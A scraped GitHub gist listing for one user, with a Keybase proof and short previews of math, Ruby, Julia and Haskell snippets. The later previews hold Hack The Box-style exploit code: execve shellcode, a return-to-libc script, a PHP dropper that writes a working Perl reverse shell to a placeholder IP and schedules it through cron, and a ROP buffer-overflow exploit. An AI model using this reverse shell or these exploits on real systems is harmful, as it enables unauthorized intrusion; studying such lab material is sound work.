I hereby claim:
- I am safiire on github.
- I am safiire (https://keybase.io/safiire) on keybase.
- I have a public key whose fingerprint is 06DC 5901 70E2 350A 4BCE 7C1D 9EFD 7244 59CC 7EB0
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma once | |
| #include <iostream> | |
| #include <cmath> | |
| #include <limits> | |
| #include "saf_math.h" | |
| //// Some more information for adding more functionality here: | |
| //// http://www.euclideanspace.com/maths/algebra/realNormedAlgebra/other/dualNumbers/functions/ |
safiire
/ keybase.md
Created
November 17, 2016 06:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'kleisli' | |
| def do_lots(count) | |
| (0..count).reduce(0){|sum, value| sum + value } | |
| end | |
| future = Future(100000000) >-> value { | |
| Future { | |
| do_lots(value.call) | |
| } >-> big_sum { |
safiire
/ rc_filter_simulation.jl
Last active
July 19, 2017 00:54
Same old RC Filter Simulation in Julia
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| abstract PassiveComponent | |
| type Resistor <: PassiveComponent | |
| value::Complex{Float64} | |
| end | |
| type Capacitor <: PassiveComponent | |
| value::Complex{Float64} | |
| end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {-# LANGUAGE OverloadedStrings, DeriveGeneric #-} | |
| import Data.Text (Text) | |
| import Data.Aeson | |
| import GHC.Generics | |
| import qualified Data.ByteString.Lazy as B | |
| data Person = | |
| Person { first :: !Text | |
| , last :: !Text |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| /* | |
| * A fork() doesn't (and shouldn't) re-randomize the address space | |
| * but that happens properly after the exec() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| // NOP padded execve("/bin/sh") | |
| char *sc = | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" |
safiire
/ october_aslr_setuid.rb
Last active
November 8, 2018 07:42
Return2LibC for a HTB setuid binary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # This is what we need to guess from ldd vuln | |
| ldd_load_address = 0xb75ba000 | |
| # Next get offset of system() and its address | |
| system_offset = 0x1e310 | |
| system_address = ldd_load_address + system_offset | |
| # Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction |
safiire
/ cron_executed_reverse_tcp.php
Created
September 26, 2018 22:54
So your shell won't inherit php's file descriptor situation.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; | |
| $fp = fopen('/tmp/shell.pl', 'w'); | |
| fwrite($fp, "#!/usr/bin/perl\n"); | |
| fwrite($fp, $perl); | |
| fclose($fp); | |
| system('chmod 777 /tmp/shell.pl'); | |
| $hour = date('H'); | |
| $minute = date('i') + 1; // disgusting | |
| $fp = fopen('/tmp/add_cron.sh', 'w'); |
safiire
/ exploit.sh
Created
January 9, 2019 20:04
Buffer overflow from a small amount of space, with some ROP and env shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ASLR is on (stack, libs, vdso, etc) | |
| # execstack is on | |
| # .text segment is static, no pie | |
| # | |
| # #include <string.h> | |
| # | |
| # int dobug(char *arg) { | |
| # char buf[8]; | |
| # strcpy(buf, arg); |